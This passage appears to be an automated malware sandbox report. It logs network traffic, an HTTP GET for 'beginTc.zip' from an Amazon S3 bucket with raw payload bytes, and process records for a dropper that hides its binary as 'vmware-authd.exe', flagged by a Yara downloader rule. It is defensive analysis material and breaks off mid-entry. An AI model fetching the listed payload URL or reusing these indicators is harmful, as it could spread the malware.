Feb 16, 2024 14:30:05.072563887 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.072654009 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.072674036 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.072710037 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.072721004 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.072746992 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.072901011 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.072913885 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.072946072 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.072968960 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.072979927 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.073005915 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.073024988 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.073199987 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.073218107 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.073255062 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.073266983 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.073292971 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.073540926 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.107577085 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.107620001 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.107773066 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.107773066 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.107836962 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.108169079 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.211316109 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.211366892 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.211586952 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.211587906 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.211652040 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.212543964 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.212851048 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.212889910 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.212923050 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.212939024 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.212970018 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.212990999 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.213176012 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.213219881 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.213239908 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.213253021 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.213289976 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.213309050 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.213478088 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.213526964 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.213547945 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.213561058 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.213588953 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.213607073 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.213948011 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.213988066 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.214020967 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.214032888 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.214062929 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.214082956 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.214662075 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.214705944 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.214744091 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.214756012 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.214782000 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.214807034 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.215503931 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.215548992 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.215586901 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.215599060 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.215627909 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.215646982 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.215877056 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.215922117 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.215945959 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.215964079 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.215985060 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.216006994 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.216705084 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.216756105 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.216819048 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.216830969 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.216856956 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.216929913 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.217329025 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.217375040 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.217396975 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.217410088 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.217438936 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.217459917 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.217480898 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.217535019 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.217547894 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.217603922 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.217645884 CET	443	49705	3.5.232.185	192.168.2.5
Feb 16, 2024 14:30:05.217700005 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.218116999 CET	49705	443	192.168.2.5	3.5.232.185
Feb 16, 2024 14:30:05.218147039 CET	443	49705	3.5.232.185	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 16, 2024 14:30:01.905898094 CET	49992	53	192.168.2.5	1.1.1.1
Feb 16, 2024 14:30:02.016587973 CET	53	49992	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 16, 2024 14:30:01.905898094 CET	192.168.2.5	1.1.1.1	0x8c39	Standard query (0)	special-edition32093201.s3.sa-east-1.amazonaws.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Feb 16, 2024 14:30:02.016587973 CET	1.1.1.1	192.168.2.5	0x8c39	No error (0)	special-edition32093201.s3.sa-east-1.amazonaws.com	s3-r-w.sa-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 16, 2024 14:30:02.016587973 CET	1.1.1.1	192.168.2.5	0x8c39	No error (0)	s3-r-w.sa-east-1.amazonaws.com		3.5.232.185	A (IP address)	IN (0x0001)	false
Feb 16, 2024 14:30:02.016587973 CET	1.1.1.1	192.168.2.5	0x8c39	No error (0)	s3-r-w.sa-east-1.amazonaws.com		3.5.232.130	A (IP address)	IN (0x0001)	false
Feb 16, 2024 14:30:02.016587973 CET	1.1.1.1	192.168.2.5	0x8c39	No error (0)	s3-r-w.sa-east-1.amazonaws.com		52.95.163.51	A (IP address)	IN (0x0001)	false
Feb 16, 2024 14:30:02.016587973 CET	1.1.1.1	192.168.2.5	0x8c39	No error (0)	s3-r-w.sa-east-1.amazonaws.com		3.5.233.121	A (IP address)	IN (0x0001)	false
Feb 16, 2024 14:30:02.016587973 CET	1.1.1.1	192.168.2.5	0x8c39	No error (0)	s3-r-w.sa-east-1.amazonaws.com		16.12.0.74	A (IP address)	IN (0x0001)	false
Feb 16, 2024 14:30:02.016587973 CET	1.1.1.1	192.168.2.5	0x8c39	No error (0)	s3-r-w.sa-east-1.amazonaws.com		16.12.1.74	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

special-edition32093201.s3.sa-east-1.amazonaws.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	3.5.232.185	443	7208	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-16 13:30:02 UTC	320	OUT	GET /beginTc.zip HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: special-edition32093201.s3.sa-east-1.amazonaws.com Connection: Keep-Alive
2024-02-16 13:30:03 UTC	435	IN	HTTP/1.1 200 OK x-amz-id-2: 35tidQGJqOGubNfIf/GdvGQUUaY8uWzQZdpH9JaJq2G+qIdO+GmNWcsbFnfdLTJLAVi7ayWipWxLnrmuvYBt0w== x-amz-request-id: XP139DB296WJBYBV Date: Fri, 16 Feb 2024 13:30:03 GMT Last-Modified: Wed, 14 Feb 2024 03:52:19 GMT ETag: "c89c700fa943b468b7de3bc145d06848" x-amz-server-side-encryption: AES256 Accept-Ranges: bytes Content-Type: application/zip Server: AmazonS3 Content-Length: 8907083 Connection: close
2024-02-16 13:30:03 UTC	15860	IN	Data Raw: c5 de 27 27 82 af 7f fb 48 a7 8c 69 d0 8f 11 45 db 44 68 ed 9c 84 26 65 db 61 b3 d1 e0 36 cb b8 cd 14 c4 23 01 07 d2 d3 a8 2b 6f 53 95 17 db 89 a8 b7 46 e3 76 65 87 47 73 83 bd bd f7 55 51 09 bd 96 68 4c 16 45 8f a0 1b 00 ad c4 61 0f 8e 03 64 74 e1 ff c0 3d c1 48 37 ce a6 58 a0 cf e6 1d f6 fb 2d c1 26 4e b2 c6 6e ac 3b f5 fd 13 b4 c9 66 78 41 49 04 e7 be ec d0 c7 a6 a2 ac 10 68 16 10 30 c2 89 e9 3c 4a 09 e8 8e dc 8f 06 d8 ef 5d b0 a2 9c 62 79 90 5f b1 c8 66 62 e2 9d 90 bb 20 ef f7 e0 04 37 f9 a8 26 ab 2e e5 b8 04 59 3c 53 7e 91 a0 02 39 db e0 f0 f9 87 96 33 75 c2 b8 76 98 84 f9 5f ed 4a 6e 71 81 da 20 15 61 a2 ae b6 15 3c ca 8d e8 cb 01 7c fa 8f 1f a4 aa b8 4b a9 24 9d ac 28 74 65 69 a3 7c bd e1 b3 59 5f 2f 4c ae 91 50 90 f7 0d 47 29 c1 a7 1a 4c 55 44 2d Data Ascii: ''HiEDh&ea6#+oSFveGsUQhLEadt=H7X-&Nn;fxAIh0<J]by_fb 7&.Y<S~93uv_Jnq a<\|K$(tei\|Y_/LPG)LUD-
2024-02-16 13:30:03 UTC	16384	IN	Data Raw: c9 6e 6d d4 14 43 bc 19 47 91 59 55 e6 a1 1b 2a 0d 8f 8e c4 93 7e 34 f3 dd e5 8f c1 cb 8d d0 5c 8e b5 a5 ac 88 80 43 cd 2f 21 16 8d 7e 33 5f da 08 aa 02 48 bb 1c 4c 90 13 bf be 3d 32 51 c7 de 74 a0 35 b6 10 c8 e6 9c f2 f6 c2 23 83 da 9b 42 f9 57 8a 17 73 5f 59 3f d9 2c 40 24 4e 4b c4 ec 0b dc e0 5e bf a0 20 67 4f 6a a8 7e 26 71 a4 59 c9 b2 13 92 2f 70 af df 98 fc 12 cf a3 c0 b8 2d 2f 32 d5 cc 2a 72 d3 d2 f1 52 68 68 0e 5d bc c7 30 f7 cb 04 99 db d7 46 49 77 fa 62 97 b8 f0 1e 1e fe 00 cc d0 f5 b2 a1 3a 08 be af bc 4e 04 fe c8 15 fb f3 3d b5 f1 24 e9 09 1b e5 09 65 d0 2d ef ba e1 94 a6 92 e8 ad 41 27 5a c1 61 cc b0 dd bc 44 82 cf b5 6a a5 14 17 c2 e2 55 60 e1 89 d9 60 b6 97 e8 b6 69 dd 61 79 cc 79 79 b9 94 6f 01 9b 8e 03 5d 73 eb fe 5d ea 9b b7 d5 6e b7 66 Data Ascii: nmCGYU~4\C/!~3_HL=2Qt5#BWs_Y?,@$NK^ gOj~&qY/p-/2rRhh]0FIwb:N=$e-A'ZaDjU``iayyyo]s]nf
2024-02-16 13:30:03 UTC	1024	IN	Data Raw: f3 2f db 7c 5d 48 47 5d 79 f2 10 89 31 8f 3a 0e f7 c2 b6 3b 33 14 c2 10 eb f4 c2 30 1b 73 14 83 88 b6 b0 6b d0 e7 ff 6a 86 84 d9 47 20 5c 02 80 1c c4 e2 5f 49 4b ec e2 ce ca 88 ab 09 27 4f f3 94 28 9f 0e 05 e6 b3 6f 3d 46 56 d5 4e 64 42 c6 07 0f b6 44 09 7a 22 94 be 8c b8 5d 77 ff 1a a7 e0 0e 3f 01 01 85 ac 9f 55 e1 e6 12 51 47 0c 1b 0c 23 cd ac ee b6 4b 1c 37 4b 63 0b bb c1 bc 47 85 c1 5d f9 1d bc 4e 75 d9 f4 31 54 87 d7 59 78 54 0d ed fa 2e 9a 51 bf 07 f4 5c 42 21 cc 28 bd 38 ba cc f3 80 88 1f 44 d0 99 31 6b 6f 6b 4b ba 60 0a c0 72 72 fb 0e 0d be 1e 79 8c 5b 2f 14 f1 b7 ce b6 1e 1d 91 7c f7 7f 28 9e 87 d1 8c a3 cc 41 23 2d 8c be 29 11 62 10 01 f6 65 1b 33 2c 93 fb 22 07 72 99 a8 1f cc 59 31 a4 a9 e8 ae f1 a9 34 38 60 08 28 b7 aa 88 61 b7 0f 62 77 d5 8e Data Ascii: /\|]HG]y1:;30skjG \_IK'O(o=FVNdBDz"]w?UQG#K7KcG]Nu1TYxT.Q\B!(8D1kokK`rry[/\|(A#-)be3,"rY148`(abw
2024-02-16 13:30:03 UTC	16384	IN	Data Raw: a2 42 00 00 05 f7 35 f8 77 5f 6d 21 b4 d1 06 51 43 2d a7 6e 92 d2 2e 6f b1 4c f5 c2 c8 46 10 35 83 91 2f cf 65 65 c2 a2 b7 8b b5 40 f6 77 36 c9 ad 91 2e 39 72 ed e6 d2 21 a9 35 77 5a 91 88 0c 3a f5 1c 50 07 42 18 08 c2 37 f8 b3 d2 de d9 60 f3 64 ac f0 f0 81 d6 96 46 f1 44 e4 c4 be 37 67 08 b9 53 de 9d 1e 3f fa 82 14 82 55 bc d8 fb 3a 6f bd 6e 7e 7b 65 4a d7 31 75 c8 08 b3 62 7f 24 c0 5d 17 31 a5 93 e6 3f 31 07 33 71 d1 5a 2f df c4 e4 d5 c7 20 1a a5 c6 54 b8 98 63 1b b8 7d 2f 17 2a e7 61 cd c5 8b 51 ca 1f 5f dd a3 41 2d bb 47 36 67 46 96 ea 85 bd 43 e8 12 08 35 c3 21 da 42 eb 86 94 cd 92 36 c0 c8 6b a1 57 78 b2 6d 0e aa 86 4c d6 79 e1 89 f6 6e 00 bd b9 99 d9 98 7d b7 3a f8 57 21 74 dc 6a f8 87 a6 80 7a 11 54 6f a1 c4 39 71 ca 28 7c 53 84 9f d4 51 0c 43 4b Data Ascii: B5w_m!QC-n.oLF5/ee@w6.9r!5wZ:PB7`dFD7gS?U:on~{eJ1ub$]1?13qZ/ Tc}/*aQ_A-G6gFC5!B6kWxmLyn}:W!tjzTo9q(\|SQCK
2024-02-16 13:30:03 UTC	1024	IN	Data Raw: 90 df 67 ea 1f 22 6a 46 9e 76 69 bf fa a4 21 b6 3d 2d 3c 96 f4 8c 2b da bd a8 5f 42 65 2c cb 27 92 5d 8a 9a b5 3e 2f 2e d3 71 17 96 cd 8f f7 a3 a2 df b9 6d b3 bd 44 c9 f4 5e 2f 65 f2 fe 36 b6 32 02 c2 d0 10 a5 a8 f6 f0 2d 9c 78 c4 8d 33 6e a1 2c fe f4 e0 f1 b0 66 66 58 c2 d2 d9 2f 0b c3 99 ba e6 e5 bc 06 0b 5b 87 86 96 db 54 af 3c 6e af 70 5f 4b 86 dd 37 fa 9e ba 25 1b 9f 77 d6 dc 19 2d 29 b4 28 45 7a af cd c2 fe c9 ac 7b cb 89 f2 f9 6a 2c f6 5a a9 17 e4 a6 7b 44 7e 76 1c fa 11 aa 5b 97 b7 0d 47 b6 70 6b 9d 0c f2 30 52 fb 7f 4e a6 25 b6 49 6b 32 dc ba 4e 4d a4 d9 fa 9a 98 5f 2c cb 0a d7 1e 60 1a e0 3d 41 4d 7e 82 55 d3 ec 4f 89 4d b4 3f 52 84 08 97 03 ac 79 ee bc 16 57 98 19 45 b5 3e a0 23 48 62 5a e8 51 35 1b e3 0d 97 5d e0 41 5f a3 be e4 40 52 6a 2c 3a Data Ascii: g"jFvi!=-<+_Be,']>/.qmD^/e62-x3n,ffX/[T<np_K7%w-)(Ez{j,Z{D~v[Gpk0RN%Ik2NM_,`=AM~UOM?RyWE>#HbZQ5]A_@Rj,:
2024-02-16 13:30:03 UTC	16384	IN	Data Raw: da 05 06 7e 8c 66 e6 85 e7 65 96 c0 2b 02 bf 97 67 3a bd 74 50 c1 a2 02 38 26 77 ca e1 c4 90 d6 de 80 fa ea 1e 24 e9 72 ed 49 63 59 2e ba 0d 02 80 b4 4b 28 99 f5 94 aa ab 3e 16 ce e1 46 1d 44 e0 60 7a 7c 30 2b a3 e2 50 2c 06 c6 2a 15 ed 7f d6 ab 04 77 45 98 e1 cd 28 56 06 88 15 ef 3b 30 4f 36 70 e7 74 8f db d8 8f c5 47 06 01 cb a2 a3 78 80 96 98 c8 84 a7 00 a3 ff 86 36 09 a5 77 98 92 41 93 70 75 13 67 23 be 99 51 29 75 b8 3a 22 3e 11 77 b3 be 60 ba 58 e0 4b 32 13 f0 21 01 bb 9a 39 2c 32 84 60 70 6e 63 8f 15 ea d4 d7 00 9b 9e 19 06 e3 24 d9 31 7b 77 ec 32 b5 46 f3 04 09 a0 5b 37 63 74 b2 d6 ed a4 b5 cc 0b 6e f5 9b 8e 61 06 1a 08 5a 32 9d 74 a8 0e 66 43 38 0b 2c 80 ba 62 63 72 4c b2 8b a0 70 69 d8 8c 52 05 e3 83 bb 94 0c a5 22 c5 c5 e2 9d 47 2e ef 7a 1d 5a Data Ascii: ~fe+g:tP8&w$rIcY.K(>FD`z\|0+P,*wE(V;0O6ptGx6wApug#Q)u:">w`XK2!9,2`pnc$1{w2F[7ctnaZ2tfC8,bcrLpiR"G.zZ
2024-02-16 13:30:03 UTC	1024	IN	Data Raw: 21 1d 8f 3a 95 76 ff 1f 04 5a 9c 44 e1 f9 27 19 5c 69 1c 9a 45 e4 20 1f ee 79 cb fb 06 be a6 e9 ba 1b 90 2b 00 cf 30 86 79 f4 f8 b2 ed 76 eb e3 de 14 0d 46 2f 9a 8a aa 88 a8 30 29 c4 89 43 00 bf 1f 43 a2 f7 f3 3a f0 31 a1 15 a5 f6 cc 74 7e b4 3d e6 33 e9 8b 18 a2 41 ba 79 83 71 15 ae 54 a0 2f 43 62 a5 59 62 07 f8 8c d1 d9 40 27 c9 2c 93 e3 40 12 94 2c 5c b7 e5 be 4c e3 f4 bc 10 a4 a3 7c 9f 04 0f 3d 4a 4e 6d 49 b6 11 77 ea be d9 fa 5d 82 b6 61 16 0f 6e da a5 dc e6 18 50 ec b0 dc 35 56 48 f2 3e 23 91 13 94 1a 15 3d 28 43 34 96 fa 6c 0c e2 17 1d 81 a8 66 1e b3 52 a3 45 52 a7 6b 89 5b 2c 77 e1 79 e7 10 52 95 7a 98 b6 11 74 91 f2 44 1c 1f 1b 2d ee 61 93 a7 d7 9d 0c 99 14 e9 f0 53 18 9d 05 f5 6b b1 b3 99 d2 06 86 58 5e 65 42 35 99 0d 2c ac 4f 16 1c aa 62 39 5f Data Ascii: !:vZD'\iE y+0yvF/0)CC:1t~=3AyqT/CbYb@',@,\L\|=JNmIw]anP5VH>#=(C4lfRERk[,wyRztD-aSkX^eB5,Ob9_
2024-02-16 13:30:03 UTC	16384	IN	Data Raw: f8 9e 3a 6f 87 20 b3 98 71 cb c5 d9 6c da a9 23 33 06 32 c6 14 32 11 e4 f6 e0 c1 7b a5 4b 50 ce d2 63 9d a7 d2 37 36 3f 55 4a 1a c2 2f fa 74 69 85 c8 21 98 3c 03 58 94 01 46 1c cf 96 0d 1f 94 d2 5f 05 55 e7 d6 d2 45 5f 2a 8d ee 68 4e a9 e2 73 8e 63 ed a5 4d 8a 6d 1e 90 a8 f9 f0 5b e7 32 de 4c 90 da aa 66 00 fc 54 76 80 9e 87 16 77 b3 0b ac d3 35 48 ea 2b f8 06 70 f0 80 0f 46 e1 75 98 f1 5a 26 90 7a 54 2e 9b a5 49 79 94 64 dd 39 e9 0e da 98 e0 b5 04 66 81 5e 3b df 3a 76 27 73 ae f7 09 47 6a 21 5f e8 ca 82 6a 08 8b 2c 07 fa d6 f8 03 6e b8 c1 18 cc 15 18 15 80 8c 60 4a 08 4d 70 eb 15 d4 2a 25 ab dd 0b 73 77 79 2b 60 41 93 e5 eb 44 8f ad 00 59 77 4b e4 45 6f c2 a1 b3 04 c3 6f ff 55 88 4b 97 9d d6 3b f0 95 75 ed 74 fb eb ca 22 71 4b 9a 0a c4 bb 52 99 37 1b fc Data Ascii: :o ql#322{KPc76?UJ/ti!<XF_UE_hNscMm[2LfTvw5H+pFuZ&zT.Iyd9f^;:v'sGj!_j,n`JMp%swy+`ADYwKEooUK;ut"qKR7
2024-02-16 13:30:03 UTC	1024	IN	Data Raw: 5d aa 83 62 18 c9 1b d6 36 b1 e0 ca cc d8 11 b9 a2 47 69 63 75 99 69 1e bd 26 e7 c8 0f 4b a1 c3 19 96 45 c7 3a 26 da a4 e2 2b 70 6a 62 ae 32 3b d6 b1 19 78 a9 06 0f a3 86 58 86 66 78 24 16 b1 97 2a d2 49 43 af b4 e2 21 8b 54 e8 27 2f bc 96 94 1f 6b c8 c7 98 94 66 51 94 7d 22 86 2d 00 f5 5b e5 63 ff 84 64 7e a3 cd d4 3e 40 2e e6 54 b6 f2 4c 61 45 18 7f b4 0a 72 c9 03 e9 2a 54 6f 4f bd 45 28 ed d2 6e 4c 88 86 cd ec 8b c4 da d8 0d 0c c4 42 6d 63 77 b0 f3 b5 67 6c 3b af 6a 0f 01 a8 bb 28 40 d2 ed 22 40 6c 4e df 6a 60 0e f7 ea f6 73 58 5a 96 cf 5b 85 a3 f1 d2 e8 6a 54 b1 92 f8 e9 6a 43 55 e1 db df ab c9 37 26 c4 e9 1c a6 26 6c bb 91 b4 83 1b 95 f3 1e 82 ae 4f ba f7 0d 59 5b 54 5b 6f 24 d5 73 d5 5d 23 85 43 09 df 4e 0d 55 ef ba f7 d4 f3 2a 51 b3 b7 38 53 39 0b Data Ascii: ]b6Gicui&KE:&+pjb2;xXfx$IC!T'/kfQ}"-[cd~>@.TLaErToOE(nLBmcwgl;j(@"@lNj`sXZ[jTjCU7&&lOY[T[o$s]#CNU*Q8S9
2024-02-16 13:30:03 UTC	16384	IN	Data Raw: 8c fb dc fc 10 a7 b1 51 26 b0 16 02 aa 0a 55 b0 1e 25 07 00 af 02 72 d6 d1 7a 43 cb 9f ce ae 99 27 50 05 38 2d 87 cb 4a 06 08 15 50 ba 99 07 5b 89 f1 b8 52 49 2f d7 e6 19 d9 6a 99 5d f2 7e 77 9d 5f ec c8 a3 7c 18 df 4c 8a d4 07 95 3c 80 e0 f5 00 18 be 17 af d8 44 cc ec a0 a7 09 3c e0 09 e6 74 4c 73 a6 ad eb ac 56 12 f3 aa d0 f3 8a e6 cb bd ee 26 c2 c5 ef b5 1c 09 d6 c3 4d f5 89 95 52 42 d3 a0 95 db f2 28 4e 44 9e b8 6f da 5d 99 6a 2d d1 2c ba 4c 8a eb 34 65 7f 78 78 b1 be 6e 78 00 32 ec 4c a3 46 86 19 e6 49 06 b2 d8 2d ac 67 db 15 95 10 70 63 ba 7b 21 0c 75 84 c3 8e e1 62 9b 17 14 0f 0a 10 11 82 61 6e 6b 51 57 6e 56 5a 37 85 aa 25 c4 4a b0 d0 7b bb 56 55 c6 18 a4 48 16 57 a0 cc 69 e2 ed f5 39 82 4a 9b 5f 61 45 f9 66 e8 7e 39 d5 7b 50 9b cb 85 47 24 de 7c Data Ascii: Q&U%rzC'P8-JP[RI/j]~w_\|L<D<tLsV&MRB(NDo]j-,L4exxnx2LFI-gpc{!ubankQWnVZ7%J{VUHWi9J_aEf~9{PG$\|

Target ID:	0
Start time:	14:29:56
Start date:	16/02/2024
Path:	C:\Users\user\Desktop\0923840932020004-3-0.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\0923840932020004-3-0.exe
Imagebase:	0xf90000
File size:	1'294'336 bytes
MD5 hash:	BAADAEDC15FE5ED8AAFB3C74CF4F2F3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	14:29:56
Start date:	16/02/2024
Path:	C:\Users\user\Desktop\0923840932020004-3-0.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\0923840932020004-3-0.exe" --rerunningWithoutUAC
Imagebase:	0xf90000
File size:	1'294'336 bytes
MD5 hash:	BAADAEDC15FE5ED8AAFB3C74CF4F2F3C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	14:29:56
Start date:	16/02/2024
Path:	C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUAC
Imagebase:	0x7ff6d64d0000
File size:	1'899'520 bytes
MD5 hash:	A560BAD9E373EA5223792D60BEDE2B13
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	14:29:59
Start date:	16/02/2024
Path:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe" --squirrel-firstrun
Imagebase:	0x480000
File size:	89'392 bytes
MD5 hash:	436CEDFA08F245AD52DD221BEC4480A4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	14:29:59
Start date:	16/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	14:30:00
Start date:	16/02/2024
Path:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe"
Imagebase:	0x480000
File size:	89'392 bytes
MD5 hash:	436CEDFA08F245AD52DD221BEC4480A4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	14:30:00
